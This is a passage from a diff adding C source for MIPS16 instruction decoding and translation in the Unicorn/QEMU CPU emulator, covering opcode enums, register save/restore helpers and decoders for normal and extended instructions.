tcg_gen_shli_i32(tcg_ctx, t1, t1, MIPS_HFLAG_M16_SHIFT); + tcg_gen_or_i32(tcg_ctx, tcg_ctx->hflags, tcg_ctx->hflags, t1); + tcg_temp_free_i32(tcg_ctx, t1); + + tcg_gen_andi_tl(tcg_ctx, 
*(TCGv *)tcg_ctx->cpu_PC, *(TCGv *)tcg_ctx->btarget, ~(target_ulong)0x1); + } else { + tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_PC, *(TCGv *)tcg_ctx->btarget); + } + if (ctx->singlestep_enabled) { + save_cpu_state(ctx, 0); + gen_helper_0e0i(tcg_ctx, raise_exception, EXCP_DEBUG); + } + tcg_gen_exit_tb(tcg_ctx, 0); + break; + default: + MIPS_DEBUG("unknown branch"); + break; + } + } +} + +/* ISA extensions (ASEs) */ +/* MIPS16 extension to MIPS32 */ + +/* MIPS16 major opcodes */ +enum { + M16_OPC_ADDIUSP = 0x00, + M16_OPC_ADDIUPC = 0x01, + M16_OPC_B = 0x02, + M16_OPC_JAL = 0x03, + M16_OPC_BEQZ = 0x04, + M16_OPC_BNEQZ = 0x05, + M16_OPC_SHIFT = 0x06, + M16_OPC_LD = 0x07, + M16_OPC_RRIA = 0x08, + M16_OPC_ADDIU8 = 0x09, + M16_OPC_SLTI = 0x0a, + M16_OPC_SLTIU = 0x0b, + M16_OPC_I8 = 0x0c, + M16_OPC_LI = 0x0d, + M16_OPC_CMPI = 0x0e, + M16_OPC_SD = 0x0f, + M16_OPC_LB = 0x10, + M16_OPC_LH = 0x11, + M16_OPC_LWSP = 0x12, + M16_OPC_LW = 0x13, + M16_OPC_LBU = 0x14, + M16_OPC_LHU = 0x15, + M16_OPC_LWPC = 0x16, + M16_OPC_LWU = 0x17, + M16_OPC_SB = 0x18, + M16_OPC_SH = 0x19, + M16_OPC_SWSP = 0x1a, + M16_OPC_SW = 0x1b, + M16_OPC_RRR = 0x1c, + M16_OPC_RR = 0x1d, + M16_OPC_EXTEND = 0x1e, + M16_OPC_I64 = 0x1f +}; + +/* I8 funct field */ +enum { + I8_BTEQZ = 0x0, + I8_BTNEZ = 0x1, + I8_SWRASP = 0x2, + I8_ADJSP = 0x3, + I8_SVRS = 0x4, + I8_MOV32R = 0x5, + I8_MOVR32 = 0x7 +}; + +/* RRR f field */ +enum { + RRR_DADDU = 0x0, + RRR_ADDU = 0x1, + RRR_DSUBU = 0x2, + RRR_SUBU = 0x3 +}; + +/* RR funct field */ +enum { + RR_JR = 0x00, + RR_SDBBP = 0x01, + RR_SLT = 0x02, + RR_SLTU = 0x03, + RR_SLLV = 0x04, + RR_BREAK = 0x05, + RR_SRLV = 0x06, + RR_SRAV = 0x07, + RR_DSRL = 0x08, + RR_CMP = 0x0a, + RR_NEG = 0x0b, + RR_AND = 0x0c, + RR_OR = 0x0d, + RR_XOR = 0x0e, + RR_NOT = 0x0f, + RR_MFHI = 0x10, + RR_CNVT = 0x11, + RR_MFLO = 0x12, + RR_DSRA = 0x13, + RR_DSLLV = 0x14, + RR_DSRLV = 0x16, + RR_DSRAV = 0x17, + RR_MULT = 0x18, + RR_MULTU = 0x19, + RR_DIV = 0x1a, + RR_DIVU = 0x1b, + RR_DMULT = 0x1c, 
+ RR_DMULTU = 0x1d, + RR_DDIV = 0x1e, + RR_DDIVU = 0x1f +}; + +/* I64 funct field */ +enum { + I64_LDSP = 0x0, + I64_SDSP = 0x1, + I64_SDRASP = 0x2, + I64_DADJSP = 0x3, + I64_LDPC = 0x4, + I64_DADDIU5 = 0x5, + I64_DADDIUPC = 0x6, + I64_DADDIUSP = 0x7 +}; + +/* RR ry field for CNVT */ +enum { + RR_RY_CNVT_ZEB = 0x0, + RR_RY_CNVT_ZEH = 0x1, + RR_RY_CNVT_ZEW = 0x2, + RR_RY_CNVT_SEB = 0x4, + RR_RY_CNVT_SEH = 0x5, + RR_RY_CNVT_SEW = 0x6, +}; + +static int xlat (int r) +{ + static int map[] = { 16, 17, 2, 3, 4, 5, 6, 7 }; + + return map[r]; +} + +static void gen_mips16_save (DisasContext *ctx, + int xsregs, int aregs, + int do_ra, int do_s0, int do_s1, + int framesize) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + TCGv t0 = tcg_temp_new(tcg_ctx); + TCGv t1 = tcg_temp_new(tcg_ctx); + int args, astatic; + + switch (aregs) { + case 0: + case 1: + case 2: + case 3: + case 11: + args = 0; + break; + case 4: + case 5: + case 6: + case 7: + args = 1; + break; + case 8: + case 9: + case 10: + args = 2; + break; + case 12: + case 13: + args = 3; + break; + case 14: + args = 4; + break; + default: + generate_exception(ctx, EXCP_RI); + return; + } + + switch (args) { + case 4: + gen_base_offset_addr(ctx, t0, 29, 12); + gen_load_gpr(ctx, t1, 7); + tcg_gen_qemu_st_tl(ctx->uc, t1, t0, ctx->mem_idx, MO_TEUL); + /* Fall through */ + case 3: + gen_base_offset_addr(ctx, t0, 29, 8); + gen_load_gpr(ctx, t1, 6); + tcg_gen_qemu_st_tl(ctx->uc, t1, t0, ctx->mem_idx, MO_TEUL); + /* Fall through */ + case 2: + gen_base_offset_addr(ctx, t0, 29, 4); + gen_load_gpr(ctx, t1, 5); + tcg_gen_qemu_st_tl(ctx->uc, t1, t0, ctx->mem_idx, MO_TEUL); + /* Fall through */ + case 1: + gen_base_offset_addr(ctx, t0, 29, 0); + gen_load_gpr(ctx, t1, 4); + tcg_gen_qemu_st_tl(ctx->uc, t1, t0, ctx->mem_idx, MO_TEUL); + } + + gen_load_gpr(ctx, t0, 29); + +#define DECR_AND_STORE(reg) do { \ + tcg_gen_subi_tl(tcg_ctx, t0, t0, 4); \ + gen_load_gpr(ctx, t1, reg); \ + 
tcg_gen_qemu_st_tl(ctx->uc, t1, t0, ctx->mem_idx, MO_TEUL); \ + } while (0) + + if (do_ra) { + DECR_AND_STORE(31); + } + + switch (xsregs) { + case 7: + DECR_AND_STORE(30); + /* Fall through */ + case 6: + DECR_AND_STORE(23); + /* Fall through */ + case 5: + DECR_AND_STORE(22); + /* Fall through */ + case 4: + DECR_AND_STORE(21); + /* Fall through */ + case 3: + DECR_AND_STORE(20); + /* Fall through */ + case 2: + DECR_AND_STORE(19); + /* Fall through */ + case 1: + DECR_AND_STORE(18); + } + + if (do_s1) { + DECR_AND_STORE(17); + } + if (do_s0) { + DECR_AND_STORE(16); + } + + switch (aregs) { + case 0: + case 4: + case 8: + case 12: + case 14: + astatic = 0; + break; + case 1: + case 5: + case 9: + case 13: + astatic = 1; + break; + case 2: + case 6: + case 10: + astatic = 2; + break; + case 3: + case 7: + astatic = 3; + break; + case 11: + astatic = 4; + break; + default: + generate_exception(ctx, EXCP_RI); + return; + } + + if (astatic > 0) { + DECR_AND_STORE(7); + if (astatic > 1) { + DECR_AND_STORE(6); + if (astatic > 2) { + DECR_AND_STORE(5); + if (astatic > 3) { + DECR_AND_STORE(4); + } + } + } + } +#undef DECR_AND_STORE + + tcg_gen_subi_tl(tcg_ctx, *cpu_gpr[29], *cpu_gpr[29], framesize); + tcg_temp_free(tcg_ctx, t0); + tcg_temp_free(tcg_ctx, t1); +} + +static void gen_mips16_restore (DisasContext *ctx, + int xsregs, int aregs, + int do_ra, int do_s0, int do_s1, + int framesize) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + int astatic; + TCGv t0 = tcg_temp_new(tcg_ctx); + TCGv t1 = tcg_temp_new(tcg_ctx); + + tcg_gen_addi_tl(tcg_ctx, t0, *cpu_gpr[29], framesize); + +#define DECR_AND_LOAD(reg) do { \ + tcg_gen_subi_tl(tcg_ctx, t0, t0, 4); \ + tcg_gen_qemu_ld_tl(ctx->uc, t1, t0, ctx->mem_idx, MO_TESL); \ + gen_store_gpr(tcg_ctx, t1, reg); \ + } while (0) + + if (do_ra) { + DECR_AND_LOAD(31); + } + + switch (xsregs) { + case 7: + DECR_AND_LOAD(30); + /* Fall through */ + case 6: + DECR_AND_LOAD(23); + /* Fall 
through */ + case 5: + DECR_AND_LOAD(22); + /* Fall through */ + case 4: + DECR_AND_LOAD(21); + /* Fall through */ + case 3: + DECR_AND_LOAD(20); + /* Fall through */ + case 2: + DECR_AND_LOAD(19); + /* Fall through */ + case 1: + DECR_AND_LOAD(18); + } + + if (do_s1) { + DECR_AND_LOAD(17); + } + if (do_s0) { + DECR_AND_LOAD(16); + } + + switch (aregs) { + case 0: + case 4: + case 8: + case 12: + case 14: + astatic = 0; + break; + case 1: + case 5: + case 9: + case 13: + astatic = 1; + break; + case 2: + case 6: + case 10: + astatic = 2; + break; + case 3: + case 7: + astatic = 3; + break; + case 11: + astatic = 4; + break; + default: + generate_exception(ctx, EXCP_RI); + return; + } + + if (astatic > 0) { + DECR_AND_LOAD(7); + if (astatic > 1) { + DECR_AND_LOAD(6); + if (astatic > 2) { + DECR_AND_LOAD(5); + if (astatic > 3) { + DECR_AND_LOAD(4); + } + } + } + } +#undef DECR_AND_LOAD + + tcg_gen_addi_tl(tcg_ctx, *cpu_gpr[29], *cpu_gpr[29], framesize); + tcg_temp_free(tcg_ctx, t0); + tcg_temp_free(tcg_ctx, t1); +} + +static void gen_addiupc (DisasContext *ctx, int rx, int imm, + int is_64_bit, int extended) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + TCGv t0; + + if (extended && (ctx->hflags & MIPS_HFLAG_BMASK)) { + generate_exception(ctx, EXCP_RI); + return; + } + + t0 = tcg_temp_new(tcg_ctx); + + tcg_gen_movi_tl(tcg_ctx, t0, pc_relative_pc(ctx)); + tcg_gen_addi_tl(tcg_ctx, *cpu_gpr[rx], t0, imm); + if (!is_64_bit) { + tcg_gen_ext32s_tl(tcg_ctx, *cpu_gpr[rx], *cpu_gpr[rx]); + } + + tcg_temp_free(tcg_ctx, t0); +} + +#if defined(TARGET_MIPS64) +static void decode_i64_mips16 (DisasContext *ctx, + int ry, int funct, int16_t offset, + int extended) +{ + switch (funct) { + case I64_LDSP: + check_mips_64(ctx); + offset = extended ? offset : offset << 3; + gen_ld(ctx, OPC_LD, ry, 29, offset); + break; + case I64_SDSP: + check_mips_64(ctx); + offset = extended ? 
offset : offset << 3; + gen_st(ctx, OPC_SD, ry, 29, offset); + break; + case I64_SDRASP: + check_mips_64(ctx); + offset = extended ? offset : (ctx->opcode & 0xff) << 3; + gen_st(ctx, OPC_SD, 31, 29, offset); + break; + case I64_DADJSP: + check_mips_64(ctx); + offset = extended ? offset : ((int8_t)ctx->opcode) << 3; + gen_arith_imm(ctx, OPC_DADDIU, 29, 29, offset); + break; + case I64_LDPC: + if (extended && (ctx->hflags & MIPS_HFLAG_BMASK)) { + generate_exception(ctx, EXCP_RI); + } else { + offset = extended ? offset : offset << 3; + gen_ld(ctx, OPC_LDPC, ry, 0, offset); + } + break; + case I64_DADDIU5: + check_mips_64(ctx); + offset = extended ? offset : ((int8_t)(offset << 3)) >> 3; + gen_arith_imm(ctx, OPC_DADDIU, ry, ry, offset); + break; + case I64_DADDIUPC: + check_mips_64(ctx); + offset = extended ? offset : offset << 2; + gen_addiupc(ctx, ry, offset, 1, extended); + break; + case I64_DADDIUSP: + check_mips_64(ctx); + offset = extended ? offset : offset << 2; + gen_arith_imm(ctx, OPC_DADDIU, ry, 29, offset); + break; + } +} +#endif + +static int decode_extended_mips16_opc (CPUMIPSState *env, DisasContext *ctx) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + int extend = cpu_lduw_code(env, ctx->pc + 2); + int op, rx, ry, funct, sa; + int16_t imm, offset; + + ctx->opcode = (ctx->opcode << 16) | extend; + op = (ctx->opcode >> 11) & 0x1f; + sa = (ctx->opcode >> 22) & 0x1f; + funct = (ctx->opcode >> 8) & 0x7; + rx = xlat((ctx->opcode >> 8) & 0x7); + ry = xlat((ctx->opcode >> 5) & 0x7); + offset = imm = (int16_t) (((ctx->opcode >> 16) & 0x1f) << 11 + | ((ctx->opcode >> 21) & 0x3f) << 5 + | (ctx->opcode & 0x1f)); + + /* The extended opcodes cleverly reuse the opcodes from their 16-bit + counterparts. 
*/ + switch (op) { + case M16_OPC_ADDIUSP: + gen_arith_imm(ctx, OPC_ADDIU, rx, 29, imm); + break; + case M16_OPC_ADDIUPC: + gen_addiupc(ctx, rx, imm, 0, 1); + break; + case M16_OPC_B: + gen_compute_branch(ctx, OPC_BEQ, 4, 0, 0, (uint32_t)offset << 1, 0); + /* No delay slot, so just process as a normal instruction */ + break; + case M16_OPC_BEQZ: + gen_compute_branch(ctx, OPC_BEQ, 4, rx, 0, (uint16_t)offset << 1, 0); + /* No delay slot, so just process as a normal instruction */ + break; + case M16_OPC_BNEQZ: + gen_compute_branch(ctx, OPC_BNE, 4, rx, 0, (uint16_t)offset << 1, 0); + /* No delay slot, so just process as a normal instruction */ + break; + case M16_OPC_SHIFT: + switch (ctx->opcode & 0x3) { + case 0x0: + gen_shift_imm(ctx, OPC_SLL, rx, ry, sa); + break; + case 0x1: +#if defined(TARGET_MIPS64) + check_mips_64(ctx); + gen_shift_imm(ctx, OPC_DSLL, rx, ry, sa); +#else + generate_exception(ctx, EXCP_RI); +#endif + break; + case 0x2: + gen_shift_imm(ctx, OPC_SRL, rx, ry, sa); + break; + case 0x3: + gen_shift_imm(ctx, OPC_SRA, rx, ry, sa); + break; + } + break; +#if defined(TARGET_MIPS64) + case M16_OPC_LD: + check_mips_64(ctx); + gen_ld(ctx, OPC_LD, ry, rx, offset); + break; +#endif + case M16_OPC_RRIA: + imm = ctx->opcode & 0xf; + imm = imm | ((ctx->opcode >> 20) & 0x7f) << 4; + imm = imm | ((ctx->opcode >> 16) & 0xf) << 11; + imm = (int16_t) (imm << 1) >> 1; + if ((ctx->opcode >> 4) & 0x1) { +#if defined(TARGET_MIPS64) + check_mips_64(ctx); + gen_arith_imm(ctx, OPC_DADDIU, ry, rx, imm); +#else + generate_exception(ctx, EXCP_RI); +#endif + } else { + gen_arith_imm(ctx, OPC_ADDIU, ry, rx, imm); + } + break; + case M16_OPC_ADDIU8: + gen_arith_imm(ctx, OPC_ADDIU, rx, rx, imm); + break; + case M16_OPC_SLTI: + gen_slt_imm(ctx, OPC_SLTI, 24, rx, imm); + break; + case M16_OPC_SLTIU: + gen_slt_imm(ctx, OPC_SLTIU, 24, rx, imm); + break; + case M16_OPC_I8: + switch (funct) { + case I8_BTEQZ: + gen_compute_branch(ctx, OPC_BEQ, 4, 24, 0, (uint16_t)offset << 1, 0); + 
break; + case I8_BTNEZ: + gen_compute_branch(ctx, OPC_BNE, 4, 24, 0, (uint16_t)offset << 1, 0); + break; + case I8_SWRASP: + gen_st(ctx, OPC_SW, 31, 29, imm); + break; + case I8_ADJSP: + gen_arith_imm(ctx, OPC_ADDIU, 29, 29, imm); + break; + case I8_SVRS: + { + int xsregs = (ctx->opcode >> 24) & 0x7; + int aregs = (ctx->opcode >> 16) & 0xf; + int do_ra = (ctx->opcode >> 6) & 0x1; + int do_s0 = (ctx->opcode >> 5) & 0x1; + int do_s1 = (ctx->opcode >> 4) & 0x1; + int framesize = (((ctx->opcode >> 20) & 0xf) << 4 + | (ctx->opcode & 0xf)) << 3; + + if (ctx->opcode & (1 << 7)) { + gen_mips16_save(ctx, xsregs, aregs, + do_ra, do_s0, do_s1, + framesize); + } else { + gen_mips16_restore(ctx, xsregs, aregs, + do_ra, do_s0, do_s1, + framesize); + } + } + break; + default: + generate_exception(ctx, EXCP_RI); + break; + } + break; + case M16_OPC_LI: + tcg_gen_movi_tl(tcg_ctx, *cpu_gpr[rx], (uint16_t) imm); + break; + case M16_OPC_CMPI: + tcg_gen_xori_tl(tcg_ctx, *cpu_gpr[24], *cpu_gpr[rx], (uint16_t) imm); + break; +#if defined(TARGET_MIPS64) + case M16_OPC_SD: + gen_st(ctx, OPC_SD, ry, rx, offset); + break; +#endif + case M16_OPC_LB: + gen_ld(ctx, OPC_LB, ry, rx, offset); + break; + case M16_OPC_LH: + gen_ld(ctx, OPC_LH, ry, rx, offset); + break; + case M16_OPC_LWSP: + gen_ld(ctx, OPC_LW, rx, 29, offset); + break; + case M16_OPC_LW: + gen_ld(ctx, OPC_LW, ry, rx, offset); + break; + case M16_OPC_LBU: + gen_ld(ctx, OPC_LBU, ry, rx, offset); + break; + case M16_OPC_LHU: + gen_ld(ctx, OPC_LHU, ry, rx, offset); + break; + case M16_OPC_LWPC: + gen_ld(ctx, OPC_LWPC, rx, 0, offset); + break; +#if defined(TARGET_MIPS64) + case M16_OPC_LWU: + gen_ld(ctx, OPC_LWU, ry, rx, offset); + break; +#endif + case M16_OPC_SB: + gen_st(ctx, OPC_SB, ry, rx, offset); + break; + case M16_OPC_SH: + gen_st(ctx, OPC_SH, ry, rx, offset); + break; + case M16_OPC_SWSP: + gen_st(ctx, OPC_SW, rx, 29, offset); + break; + case M16_OPC_SW: + gen_st(ctx, OPC_SW, ry, rx, offset); + break; +#if 
defined(TARGET_MIPS64) + case M16_OPC_I64: + decode_i64_mips16(ctx, ry, funct, offset, 1); + break; +#endif + default: + generate_exception(ctx, EXCP_RI); + break; + } + + return 4; +} + +static int decode_mips16_opc (CPUMIPSState *env, DisasContext *ctx, bool *insn_need_patch) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + int rx, ry; + int sa; + int op, cnvt_op, op1, offset; + int funct; + int n_bytes; + + op = (ctx->opcode >> 11) & 0x1f; + sa = (ctx->opcode >> 2) & 0x7; + sa = sa == 0 ? 8 : sa; + rx = xlat((ctx->opcode >> 8) & 0x7); + cnvt_op = (ctx->opcode >> 5) & 0x7; + ry = xlat((ctx->opcode >> 5) & 0x7); + op1 = offset = ctx->opcode & 0x1f; + + n_bytes = 2; + + // Unicorn: trace this instruction on request + if (HOOK_EXISTS_BOUNDED(env->uc, UC_HOOK_CODE, ctx->pc)) { + gen_uc_tracecode(tcg_ctx, 0xf8f8f8f8, UC_HOOK_CODE_IDX, env->uc, ctx->pc); + *insn_need_patch = true; + // the callback might want to stop emulation immediately + check_exit_request(tcg_ctx); + } + + switch (op) { + case M16_OPC_ADDIUSP: + { + int16_t imm = ((uint8_t) ctx->opcode) << 2; + + gen_arith_imm(ctx, OPC_ADDIU, rx, 29, imm); + } + break; + case M16_OPC_ADDIUPC: + gen_addiupc(ctx, rx, ((uint8_t) ctx->opcode) << 2, 0, 0); + break; + case M16_OPC_B: + offset = (ctx->opcode & 0x7ff) << 1; + offset = (int16_t)(offset << 4) >> 4; + gen_compute_branch(ctx, OPC_BEQ, 2, 0, 0, offset, 0); + /* No delay slot, so just process as a normal instruction */ + break; + case M16_OPC_JAL: + offset = cpu_lduw_code(env, ctx->pc + 2); + offset = (((ctx->opcode & 0x1f) << 21) + | ((ctx->opcode >> 5) & 0x1f) << 16 + | offset) << 2; + op = ((ctx->opcode >> 10) & 0x1) ? 
OPC_JALX : OPC_JAL; + gen_compute_branch(ctx, op, 4, rx, ry, offset, 2); + n_bytes = 4; + break; + case M16_OPC_BEQZ: + gen_compute_branch(ctx, OPC_BEQ, 2, rx, 0, + ((uint8_t)ctx->opcode) << 1, 0); + /* No delay slot, so just process as a normal instruction */ + break; + case M16_OPC_BNEQZ: + gen_compute_branch(ctx, OPC_BNE, 2, rx, 0, + ((uint8_t)ctx->opcode) << 1, 0); + /* No delay slot, so just process as a normal instruction */ + break; + case M16_OPC_SHIFT: + switch (ctx->opcode & 0x3) { + case 0x0: + gen_shift_imm(ctx, OPC_SLL, rx, ry, sa); + break; + case 0x1: +#if defined(TARGET_MIPS64) + check_mips_64(ctx); + gen_shift_imm(ctx, OPC_DSLL, rx, ry, sa); +#else + generate_exception(ctx, EXCP_RI); +#endif + break; + case 0x2: + gen_shift_imm(ctx, OPC_SRL, rx, ry, sa); + break; + case 0x3: + gen_shift_imm(ctx, OPC_SRA, rx, ry, sa); + break; + } + break; +#if defined(TARGET_MIPS64) + case M16_OPC_LD: + check_mips_64(ctx); + gen_ld(ctx, OPC_LD, ry, rx, offset << 3); + break; +#endif + case M16_OPC_RRIA: + { + int16_t imm = (int8_t)((ctx->opcode & 0xf) << 4) >> 4; + + if ((ctx->opcode >> 4) & 1) { +#if defined(TARGET_MIPS64) + check_mips_64(ctx); + gen_arith_imm(ctx, OPC_DADDIU, ry, rx, imm); +#else + generate_exception(ctx, EXCP_RI); +#endif + } else { + gen_arith_imm(ctx, OPC_ADDIU, ry, rx, imm); + } + } + break; + case M16_OPC_ADDIU8: + { + int16_t imm = (int8_t) ctx->opcode; + + gen_arith_imm(ctx, OPC_ADDIU, rx, rx, imm); + } + break; + case M16_OPC_SLTI: + { + int16_t imm = (uint8_t) ctx->opcode; + gen_slt_imm(ctx, OPC_SLTI, 24, rx, imm); + } + break; + case M16_OPC_SLTIU: + { + int16_t imm = (uint8_t) ctx->opcode; + gen_slt_imm(ctx, OPC_SLTIU, 24, rx, imm); + } + break; + case M16_OPC_I8: + { + int reg32; + + funct = (ctx->opcode >> 8) & 0x7; + switch (funct) { + case I8_BTEQZ: + gen_compute_branch(ctx, OPC_BEQ, 2, 24, 0, + ((uint8_t)ctx->opcode) << 1, 0); + break; + case I8_BTNEZ: + gen_compute_branch(ctx, OPC_BNE, 2, 24, 0, + ((uint8_t)ctx->opcode) << 1, 0); 
+ break; + case I8_SWRASP: + gen_st(ctx, OPC_SW, 31, 29, (ctx->opcode & 0xff) << 2); + break; + case I8_ADJSP: + gen_arith_imm(ctx, OPC_ADDIU, 29, 29, + ((uint8_t)ctx->opcode) << 3); + break; + case I8_SVRS: + { + int do_ra = ctx->opcode & (1 << 6); + int do_s0 = ctx->opcode & (1 << 5); + int do_s1 = ctx->opcode & (1 << 4); + int framesize = ctx->opcode & 0xf; + + if (framesize == 0) { + framesize = 128; + } else { + framesize = framesize << 3; + } + + if (ctx->opcode & (1 << 7)) { + gen_mips16_save(ctx, 0, 0, + do_ra, do_s0, do_s1, framesize); + } else { + gen_mips16_restore(ctx, 0, 0, + do_ra, do_s0, do_s1, framesize); + } + } + break; + case I8_MOV32R: + { + int rz = xlat(ctx->opcode & 0x7); + + reg32 = (((ctx->opcode >> 3) & 0x3) << 3) | + ((ctx->opcode >> 5) & 0x7); + gen_arith(ctx, OPC_ADDU, reg32, rz, 0); + } + break; + case I8_MOVR32: + reg32 = ctx->opcode & 0x1f; + gen_arith(ctx, OPC_ADDU, ry, reg32, 0); + break; + default: + generate_exception(ctx, EXCP_RI); + break; + } + } + break; + case M16_OPC_LI: + { + int16_t imm = (uint8_t) ctx->opcode; + + gen_arith_imm(ctx, OPC_ADDIU, rx, 0, imm); + } + break; + case M16_OPC_CMPI: + { + int16_t imm = (uint8_t) ctx->opcode; + gen_logic_imm(ctx, OPC_XORI, 24, rx, imm); + } + break; +#if defined(TARGET_MIPS64) + case M16_OPC_SD: + check_mips_64(ctx); + gen_st(ctx, OPC_SD, ry, rx, offset << 3); + break; +#endif + case M16_OPC_LB: + gen_ld(ctx, OPC_LB, ry, rx, offset); + break; + case M16_OPC_LH: + gen_ld(ctx, OPC_LH, ry, rx, offset << 1); + break; + case M16_OPC_LWSP: + gen_ld(ctx, OPC_LW, rx, 29, ((uint8_t)ctx->opcode) << 2); + break; + case M16_OPC_LW: + gen_ld(ctx, OPC_LW, ry, rx, offset << 2); + break; + case M16_OPC_LBU: + gen_ld(ctx, OPC_LBU, ry, rx, offset); + break; + case M16_OPC_LHU: + gen_ld(ctx, OPC_LHU, ry, rx, offset << 1); + break; + case M16_OPC_LWPC: + gen_ld(ctx, OPC_LWPC, rx, 0, ((uint8_t)ctx->opcode) << 2); + break; +#if defined (TARGET_MIPS64) + case M16_OPC_LWU: + check_mips_64(ctx); + 
gen_ld(ctx, OPC_LWU, ry, rx, offset << 2); + break; +#endif + case M16_OPC_SB: + gen_st(ctx, OPC_SB, ry, rx, offset); + break; + case M16_OPC_SH: + gen_st(ctx, OPC_SH, ry, rx, offset << 1); + break; + case M16_OPC_SWSP: + gen_st(ctx, OPC_SW, rx, 29, ((uint8_t)ctx->opcode) << 2); + break; + case M16_OPC_SW: + gen_st(ctx, OPC_SW, ry, rx, offset << 2); + break; + case M16_OPC_RRR: + { + int rz = xlat((ctx->opcode >> 2) & 0x7); + int mips32_op; + + switch (ctx->opcode & 0x3) { + case RRR_ADDU: + mips32_op = OPC_ADDU; + break; + case RRR_SUBU: + mips32_op = OPC_SUBU; + break; +#if defined(TARGET_MIPS64) + case RRR_DADDU: + mips32_op = OPC_DADDU; + check_mips_64(ctx); + break; + case RRR_DSUBU: + mips32_op = OPC_DSUBU; + check_mips_64(ctx); + break; +#endif + default: + generate_exception(ctx, EXCP_RI); + goto done; + } + + gen_arith(ctx, mips32_op, rz, rx, ry); + done: + ; + } + break; + case M16_OPC_RR: + switch (op1) { + case RR_JR: + { + int nd = (ctx->opcode >> 7) & 0x1; + int link = (ctx->opcode >> 6) & 0x1; + int ra = (ctx->opcode >> 5) & 0x1; + + if (link) { + op = OPC_JALR; + } else { + op = OPC_JR; + } + + gen_compute_branch(ctx, op, 2, ra ? 31 : rx, 31, 0, + (nd ? 0 : 2)); + } + break; + case RR_SDBBP: + /* XXX: not clear which exception should be raised + * when in debug mode... 
+ */ + check_insn(ctx, ISA_MIPS32); + if (!(ctx->hflags & MIPS_HFLAG_DM)) { + generate_exception(ctx, EXCP_DBp); + } else { + generate_exception(ctx, EXCP_DBp); + } + break; + case RR_SLT: + gen_slt(ctx, OPC_SLT, 24, rx, ry); + break; + case RR_SLTU: + gen_slt(ctx, OPC_SLTU, 24, rx, ry); + break; + case RR_BREAK: + generate_exception(ctx, EXCP_BREAK); + break; + case RR_SLLV: + gen_shift(ctx, OPC_SLLV, ry, rx, ry); + break; + case RR_SRLV: + gen_shift(ctx, OPC_SRLV, ry, rx, ry); + break; + case RR_SRAV: + gen_shift(ctx, OPC_SRAV, ry, rx, ry); + break; +#if defined (TARGET_MIPS64) + case RR_DSRL: + check_mips_64(ctx); + gen_shift_imm(ctx, OPC_DSRL, ry, ry, sa); + break; +#endif + case RR_CMP: + gen_logic(ctx, OPC_XOR, 24, rx, ry); + break; + case RR_NEG: + gen_arith(ctx, OPC_SUBU, rx, 0, ry); + break; + case RR_AND: + gen_logic(ctx, OPC_AND, rx, rx, ry); + break; + case RR_OR: + gen_logic(ctx, OPC_OR, rx, rx, ry); + break; + case RR_XOR: + gen_logic(ctx, OPC_XOR, rx, rx, ry); + break; + case RR_NOT: + gen_logic(ctx, OPC_NOR, rx, ry, 0); + break; + case RR_MFHI: + gen_HILO(ctx, OPC_MFHI, 0, rx); + break; + case RR_CNVT: + switch (cnvt_op) { + case RR_RY_CNVT_ZEB: + tcg_gen_ext8u_tl(tcg_ctx, *cpu_gpr[rx], *cpu_gpr[rx]); + break; + case RR_RY_CNVT_ZEH: + tcg_gen_ext16u_tl(tcg_ctx, *cpu_gpr[rx], *cpu_gpr[rx]); + break; + case RR_RY_CNVT_SEB: + tcg_gen_ext8s_tl(tcg_ctx, *cpu_gpr[rx], *cpu_gpr[rx]); + break; + case RR_RY_CNVT_SEH: + tcg_gen_ext16s_tl(tcg_ctx, *cpu_gpr[rx], *cpu_gpr[rx]); + break; +#if defined (TARGET_MIPS64) + case RR_RY_CNVT_ZEW: + check_mips_64(ctx); + tcg_gen_ext32u_tl(tcg_ctx, *cpu_gpr[rx], *cpu_gpr[rx]); + break; + case RR_RY_CNVT_SEW: + check_mips_64(ctx); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_gpr[rx], *cpu_gpr[rx]); + break; +#endif + default: + generate_exception(ctx, EXCP_RI); + break; + } + break; + case RR_MFLO: + gen_HILO(ctx, OPC_MFLO, 0, rx); + break; +#if defined (TARGET_MIPS64) + case RR_DSRA: + check_mips_64(ctx); + gen_shift_imm(ctx, 
OPC_DSRA, ry, ry, sa); + break; + case RR_DSLLV: + check_mips_64(ctx); + gen_shift(ctx, OPC_DSLLV, ry, rx, ry); + break; + case RR_DSRLV: + check_mips_64(ctx); + gen_shift(ctx, OPC_DSRLV, ry, rx, ry); + break; + case RR_DSRAV: + check_mips_64(ctx); + gen_shift(ctx, OPC_DSRAV, ry, rx, ry); + break; +#endif + case RR_MULT: + gen_muldiv(ctx, OPC_MULT, 0, rx, ry); + break; + case RR_MULTU: + gen_muldiv(ctx, OPC_MULTU, 0, rx, ry); + break; + case RR_DIV: + gen_muldiv(ctx, OPC_DIV, 0, rx, ry); + break; + case RR_DIVU: + gen_muldiv(ctx, OPC_DIVU, 0, rx, ry); + break; +#if defined (TARGET_MIPS64) + case RR_DMULT: + check_mips_64(ctx); + gen_muldiv(ctx, OPC_DMULT, 0, rx, ry); + break; + case RR_DMULTU: + check_mips_64(ctx); + gen_muldiv(ctx, OPC_DMULTU, 0, rx, ry); + break; + case RR_DDIV: + check_mips_64(ctx); + gen_muldiv(ctx, OPC_DDIV, 0, rx, ry); + break; + case RR_DDIVU: + check_mips_64(ctx); + gen_muldiv(ctx, OPC_DDIVU, 0, rx, ry); + break; +#endif + default: + generate_exception(ctx, EXCP_RI); + break; + } + break; + case M16_OPC_EXTEND: + decode_extended_mips16_opc(env, ctx); + n_bytes = 4; + break; +#if defined(TARGET_MIPS64) + case M16_OPC_I64: + funct = (ctx->opcode >> 8) & 0x7; + decode_i64_mips16(ctx, ry, funct, offset, 0); + break; +#endif + default: + generate_exception(ctx, EXCP_RI); + break; + } + + return n_bytes; +} + +/* microMIPS extension to MIPS32/MIPS64 */ + 